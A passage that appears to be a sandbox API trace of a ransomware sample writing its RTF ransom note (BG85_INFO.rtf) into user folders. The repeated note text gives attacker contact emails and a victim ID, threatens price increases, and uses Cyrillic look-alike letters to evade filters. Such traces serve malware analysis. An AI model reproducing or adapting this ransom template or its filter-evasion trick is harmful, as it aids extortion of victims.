-m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0068.016] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0068.017] CloseHandle (hObject=0x1cc) returned 1 [0068.018] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\21Ar6w3\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vlykov4y_3l2vkihp\\21ar6w3\\bg85_info.rtf")) returned 0xffffffff [0068.018] GetLastError () returned 0x2 [0068.018] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\21Ar6w3\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vlykov4y_3l2vkihp\\21ar6w3\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0068.018] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0068.018] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st 